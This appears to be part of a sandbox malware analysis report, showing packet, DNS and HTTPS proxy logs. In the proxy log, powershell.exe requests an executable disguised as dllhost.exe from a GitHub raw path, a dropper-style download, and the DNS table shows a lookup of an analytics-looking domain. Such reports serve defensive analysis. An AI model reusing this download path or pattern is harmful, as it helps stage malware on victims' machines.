                                                                                              Aug 10, 2022 06:47:36.229823112 CEST44349807140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:36.229829073 CEST49807443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:36.229990959 CEST44349807140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:36.230077028 CEST44349807140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:36.230128050 CEST49807443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:36.230144024 CEST49807443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:36.230159044 CEST44349807140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:36.230309963 CEST44349807140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:36.230379105 CEST49807443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:36.230402946 CEST44349807140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:36.230711937 CEST44349807140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:36.230773926 CEST44349807140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:36.230870962 CEST44349807140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:36.230962992 CEST44349807140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:36.231002092 CEST49807443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:36.231024981 CEST44349807140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:36.231199026 CEST49807443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:36.231235027 CEST44349807140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:36.231245995 CEST49807443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:36.231259108 CEST44349807140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:36.231440067 CEST49807443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:36.231616020 CEST49807443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:59.467133999 CEST49809443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:59.467215061 CEST44349809140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:59.468449116 CEST49809443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:59.469734907 CEST49809443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:59.469793081 CEST44349809140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:59.495614052 CEST44349809140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:59.495821953 CEST49809443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:59.497087002 CEST49809443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:59.497808933 CEST44349809140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:59.500147104 CEST49809443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:59.542473078 CEST44349809140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:59.675915956 CEST44349809140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:59.676275969 CEST44349809140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:59.676503897 CEST44349809140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:59.676654100 CEST44349809140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:59.676839113 CEST44349809140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:59.676954031 CEST44349809140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:59.677052975 CEST44349809140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:59.677395105 CEST49809443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:59.677433014 CEST44349809140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:59.677443981 CEST49809443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:59.678122997 CEST49809443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:59.678519011 CEST49809443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:59.685406923 CEST44349809140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:59.685761929 CEST44349809140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:59.685970068 CEST49809443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:59.686003923 CEST44349809140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:59.686033964 CEST44349809140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:59.686338902 CEST49809443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:59.686381102 CEST44349809140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:59.686654091 CEST44349809140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:59.686822891 CEST44349809140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:59.686845064 CEST49809443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:59.686867952 CEST44349809140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:59.687031031 CEST49809443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:59.687072992 CEST44349809140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:59.687315941 CEST44349809140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:59.687444925 CEST44349809140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:59.687546015 CEST49809443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:59.687578917 CEST44349809140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:59.687753916 CEST44349809140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:59.687823057 CEST49809443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:59.687849045 CEST44349809140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:59.687977076 CEST44349809140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:59.688062906 CEST49809443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:59.688097954 CEST44349809140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:59.688244104 CEST49809443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:59.688273907 CEST44349809140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:59.688446045 CEST49809443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:59.688477993 CEST44349809140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:59.695826054 CEST44349809140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:59.695939064 CEST44349809140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:59.696115971 CEST44349809140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:59.696157932 CEST44349809140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:59.696346045 CEST49809443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:59.696384907 CEST44349809140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:59.696393967 CEST49809443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:59.696546078 CEST44349809140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:59.696619987 CEST44349809140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:59.696723938 CEST49809443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:59.696753025 CEST44349809140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:59.696913958 CEST49809443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:59.696928978 CEST49809443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:59.696945906 CEST44349809140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:59.696963072 CEST44349809140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:59.697143078 CEST44349809140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:59.697176933 CEST49809443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:59.697197914 CEST44349809140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:59.697386980 CEST44349809140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:59.697495937 CEST44349809140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:59.697546959 CEST49809443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:59.697568893 CEST44349809140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:59.697731972 CEST49809443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:59.697784901 CEST44349809140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:59.697920084 CEST44349809140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:59.697978973 CEST49809443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:59.698002100 CEST44349809140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:59.698127985 CEST44349809140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:59.698173046 CEST49809443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:59.698193073 CEST44349809140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:59.698342085 CEST49809443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:59.698369026 CEST44349809140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:59.698534012 CEST49809443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:59.698563099 CEST44349809140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:59.698715925 CEST44349809140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:59.698812962 CEST44349809140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:59.698983908 CEST49809443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:59.699012041 CEST44349809140.82.121.4192.168.11.20
                                                                                              Aug 10, 2022 06:47:59.699018955 CEST49809443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:59.699037075 CEST49809443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:59.699168921 CEST49809443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:59.699354887 CEST49809443192.168.11.20140.82.121.4
                                                                                              Aug 10, 2022 06:47:59.699373960 CEST49809443192.168.11.20140.82.121.4

                                                                                              UDP Packets

                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Aug 10, 2022 06:46:43.148783922 CEST6549553192.168.11.201.1.1.1
                                                                                              Aug 10, 2022 06:46:43.157864094 CEST53654951.1.1.1192.168.11.20
                                                                                              Aug 10, 2022 06:47:36.003865004 CEST5394653192.168.11.201.1.1.1
                                                                                              Aug 10, 2022 06:47:36.013130903 CEST53539461.1.1.1192.168.11.20
                                                                                              Aug 10, 2022 06:48:01.342305899 CEST5932353192.168.11.201.1.1.1
                                                                                              Aug 10, 2022 06:48:01.361826897 CEST53593231.1.1.1192.168.11.20

                                                                                              DNS Queries

                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                              Aug 10, 2022 06:46:43.148783922 CEST192.168.11.201.1.1.10x9da0Standard query (0)github.comA (IP address)IN (0x0001)
                                                                                              Aug 10, 2022 06:47:36.003865004 CEST192.168.11.201.1.1.10xcabeStandard query (0)github.comA (IP address)IN (0x0001)
                                                                                              Aug 10, 2022 06:48:01.342305899 CEST192.168.11.201.1.1.10xd600Standard query (0)collect.installeranalytics.comA (IP address)IN (0x0001)

                                                                                              DNS Answers

                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                              Aug 10, 2022 06:46:43.157864094 CEST1.1.1.1192.168.11.200x9da0No error (0)github.com140.82.121.4A (IP address)IN (0x0001)
                                                                                              Aug 10, 2022 06:47:36.013130903 CEST1.1.1.1192.168.11.200xcabeNo error (0)github.com140.82.121.4A (IP address)IN (0x0001)
                                                                                              Aug 10, 2022 06:48:01.361826897 CEST1.1.1.1192.168.11.200xd600No error (0)collect.installeranalytics.com3.227.31.211A (IP address)IN (0x0001)
                                                                                              Aug 10, 2022 06:48:01.361826897 CEST1.1.1.1192.168.11.200xd600No error (0)collect.installeranalytics.com35.153.149.66A (IP address)IN (0x0001)

                                                                                              HTTP Request Dependency Graph

                                                                                              • github.com

                                                                                              HTTPS Proxied Packets

                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              0192.168.11.2049803140.82.121.4443C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              2022-08-10 04:46:43 UTC0OUTGET /gowgerrie/reborn/raw/main/04/dllhost.exe HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                              Host: github.com
                                                                                              Connection: Keep-Alive
                                                                                              2022-08-10 04:46:43 UTC0INHTTP/1.1 404 Not Found
                                                                                              Server: GitHub.com
                                                                                              Date: Wed, 10 Aug 2022 04:46:43 GMT
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                              permissions-policy: interest-cohort=()
                                                                                              Cache-Control: no-cache
                                                                                              Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                              X-Frame-Options: deny
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 0
                                                                                              Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-origin
                                                                                              Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                              2022-08-10 04:46:43 UTC0INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                              Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.
                                                                                              2022-08-10 04:46:43 UTC2INData Raw: 46 30 41 35 0d 0a 0a 0a 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 6d 6f 64 65 3d 22 61 75 74 6f 22 20 64 61 74 61 2d 6c 69 67 68 74 2d 74 68 65 6d 65 3d 22 6c 69 67 68 74 22 20 64 61 74 61 2d 64 61 72 6b 2d 74 68 65 6d 65 3d 22 64 61 72 6b 22 20 64 61 74 61 2d 61 31 31 79 2d 61 6e 69 6d 61 74 65 64 2d 69 6d 61 67 65 73 3d 22 73 79 73 74 65 6d 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 22 3e 0a 20
                                                                                              Data Ascii: F0A5<!DOCTYPE html><html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system"> <head> <meta charset="utf-8"> <link rel="dns-prefetch" href="https://github.githubassets.com">
                                                                                              2022-08-10 04:46:43 UTC2INData Raw: 75 64 2e 73 33 2e 61 6d 61 7a 6f 6e 61 77 73 2e 63 6f 6d 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 75 73 65 72 2d 69 6d 61 67 65 73 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 76 61 74 61 72 73 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 22 3e 0a 0a 0a 0a 20 20 3c 6c
                                                                                              Data Ascii: ud.s3.amazonaws.com"> <link rel="dns-prefetch" href="https://user-images.githubusercontent.com/"> <link rel="preconnect" href="https://github.githubassets.com" crossorigin> <link rel="preconnect" href="https://avatars.githubusercontent.com"> <l
                                                                                              2022-08-10 04:46:43 UTC4INData Raw: 69 61 3d 22 61 6c 6c 22 20 69 6e 74 65 67 72 69 74 79 3d 22 73 68 61 35 31 32 2d 55 52 50 53 76 69 43 77 34 6d 34 6e 37 31 49 4b 6e 34 71 79 75 37 4d 45 44 70 47 62 43 69 54 66 73 4d 54 4e 72 55 6a 50 77 63 67 33 38 4b 74 45 4b 44 74 31 32 76 7a 6a 6c 4e 7a 6f 79 33 59 44 46 69 51 38 44 30 54 43 43 59 4b 43 74 72 5a 70 71 58 30 39 37 67 3d 3d 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 64 61 74 61 2d 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 64 61 72 6b 5f 63 6f 6c 6f 72 62 6c 69 6e 64 2d 35 31 31 33 64 32 62 65 32 30 62 30 2e 63 73 73 22 20 2f 3e 3c 6c 69 6e 6b 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 74 68 65 6d 65 3d 22 6c 69 67 68 74 5f 63 6f 6c 6f 72
                                                                                              Data Ascii: ia="all" integrity="sha512-URPSviCw4m4n71IKn4qyu7MEDpGbCiTfsMTNrUjPwcg38KtEKDt12vzjlNzoy3YDFiQ8D0TCCYKCtrZpqX097g==" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_colorblind-5113d2be20b0.css" /><link data-color-theme="light_color
                                                                                              2022-08-10 04:46:43 UTC5INData Raw: 30 66 30 37 38 62 2e 63 73 73 22 20 2f 3e 0a 20 20 0a 20 20 20 20 3c 6c 69 6e 6b 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 69 6e 74 65 67 72 69 74 79 3d 22 73 68 61 35 31 32 2d 53 55 71 79 45 51 6f 71 69 79 62 46 34 54 47 64 4c 48 30 74 68 34 76 44 4c 39 49 39 45 46 47 54 58 66 63 74 68 39 43 49 56 41 6f 4e 65 51 4a 66 41 79 66 75 38 4d 74 6d 4f 4d 57 62 47 6e 71 50 36 56 78 46 49 51 36 56 64 44 48 78 68 64 58 4e 47 31 6b 2f 2f 51 3d 3d 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 70 72 69 6d 65 72 2d 34 39 34 61 62 32 31 31 30 61 32 61 2e 63
                                                                                              Data Ascii: 0f078b.css" /> <link crossorigin="anonymous" media="all" integrity="sha512-SUqyEQoqiybF4TGdLH0th4vDL9I9EFGTXfcth9CIVAoNeQJfAyfu8MtmOMWbGnqP6VxFIQ6VdDHxhdXNG1k//Q==" rel="stylesheet" href="https://github.githubassets.com/assets/primer-494ab2110a2a.c
                                                                                              2022-08-10 04:46:43 UTC6INData Raw: 53 68 5a 56 72 62 4e 66 73 55 55 5a 52 70 30 61 32 52 43 5a 4e 59 72 46 4a 59 46 6c 59 68 64 44 55 32 50 2b 55 43 38 61 78 67 56 54 31 37 6f 71 76 31 42 56 51 4c 6e 67 53 73 47 6f 69 42 4e 32 4d 4a 70 77 3d 3d 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 6d 61 6e 75 65 6c 70 75 79 6f 6c 5f 74 75 72 62 6f 5f 64 69 73 74 5f 74 75 72 62 6f 5f 65 73 32 30 31 37 2d 65 73 6d 5f 6a 73 2d 38 61 66 39 62 61 65 66 61 62 39 65 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79
                                                                                              Data Ascii: ShZVrbNfsUUZRp0a2RCZNYrFJYFlYhdDU2P+UC8axgVT17oqv1BVQLngSsGoiBN2MJpw==" src="https://github.githubassets.com/assets/vendors-node_modules_manuelpuyol_turbo_dist_turbo_es2017-esm_js-8af9baefab9e.js"></script><script crossorigin="anonymous" defer="defer" ty
                                                                                              2022-08-10 04:46:43 UTC8INData Raw: 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 64 65 6c 65 67 61 74 65 64 2d 65 76 65 6e 74 73 5f 64 69 73 74 5f 69 6e 64 65 78 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 64 65 74 61 69 6c 73 2d 64 69 61 6c 6f 67 2d 65 6c 65 6d 65 6e 2d 36 33 64 65 62 65 2d 34 61 32 66 33 37 66 37 34 31 39 65 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 69 6e 74 65 67 72 69 74 79 3d 22 73 68 61 35 31 32 2d 49 57 33 4a 73 65 4f 30 6d 30 79 63 6c 69 78 73 78 44 77 75 58 42 6c 41 70 30 2b 62 58 56 5a 6b 41
                                                                                              Data Ascii: vendors-node_modules_delegated-events_dist_index_js-node_modules_github_details-dialog-elemen-63debe-4a2f37f7419e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" integrity="sha512-IW3JseO0m0yclixsxDwuXBlAp0+bXVZkA
                                                                                              2022-08-10 04:46:43 UTC9INData Raw: 4b 42 51 3d 3d 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 66 69 6c 65 2d 61 74 74 61 63 68 6d 65 6e 74 2d 65 6c 65 6d 65 6e 74 5f 64 69 73 74 5f 69 6e 64 65 78 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 70 72 69 6d 65 72 5f 76 69 65 77 2d 63 6f 2d 62 33 64 33 32 66 2d 63 32 35 31 39 65 32 30 65 35 62 39 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20
                                                                                              Data Ascii: KBQ==" src="https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_primer_view-co-b3d32f-c2519e20e5b9.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript"
                                                                                              2022-08-10 04:46:43 UTC10INData Raw: 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 69 6e 74 65 67 72 69 74 79 3d 22 73 68 61 35 31 32 2d 59 6c 5a 7a 66 44 73 30 73 4a 77 62 34 4c 44 50 6f 59 47 7a 70 70 61 61 73 47 2f 79 76 59 38 44 6f 6c 56 6b 36 34 75 37 4b 6a 70 79 7a 2f 4e 70 4b 53 33 45 37 74 6f 42 6b 48 63 44 78 4e 53 42 38 78 37 6d 6c 44 44 6a 43 32 6e 48 75 57 69 6c 74 73 4d 47 76 51 3d 3d 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67
                                                                                              Data Ascii: ipt><script crossorigin="anonymous" defer="defer" type="application/javascript" integrity="sha512-YlZzfDs0sJwb4LDPoYGzppaasG/yvY8DolVk64u7Kjpyz/NpKS3E7toBkHcDxNSB8x7mlDDjC2nHuWiltsMGvQ==" src="https://github.githubassets.com/assets/vendors-node_modules_g
                                                                                              2022-08-10 04:46:43 UTC12INData Raw: 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 69 6e 74 65 67 72 69 74 79 3d 22 73 68 61 35 31 32 2d 4d 55 71 6c 6c 55 31 7a 57 53 63 4a 72 47 34 34 75 68 50 69 4b 38 69 72 69 72 30 6e 77 36 53 65 70 47 76 70 2b 72 77 6a 52 51 52 6e 4c 6e 4b 54 6c 49 67 61 43 4f 31 4e 37 4f 45 5a 33 58 53 71 48 49 4a 79 4e 6e 5a 52 31 55 6c 41 32 39 6c 42 5a 72 71 78 53 77 3d 3d 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74
                                                                                              Data Ascii: ipt><script crossorigin="anonymous" defer="defer" type="application/javascript" integrity="sha512-MUqllU1zWScJrG44uhPiK8irir0nw6SepGvp+rwjRQRnLnKTlIgaCO1N7OEZ3XSqHIJyNnZR1UlA29lBZrqxSw==" src="https://github.githubassets.com/assets/app_assets_modules_git
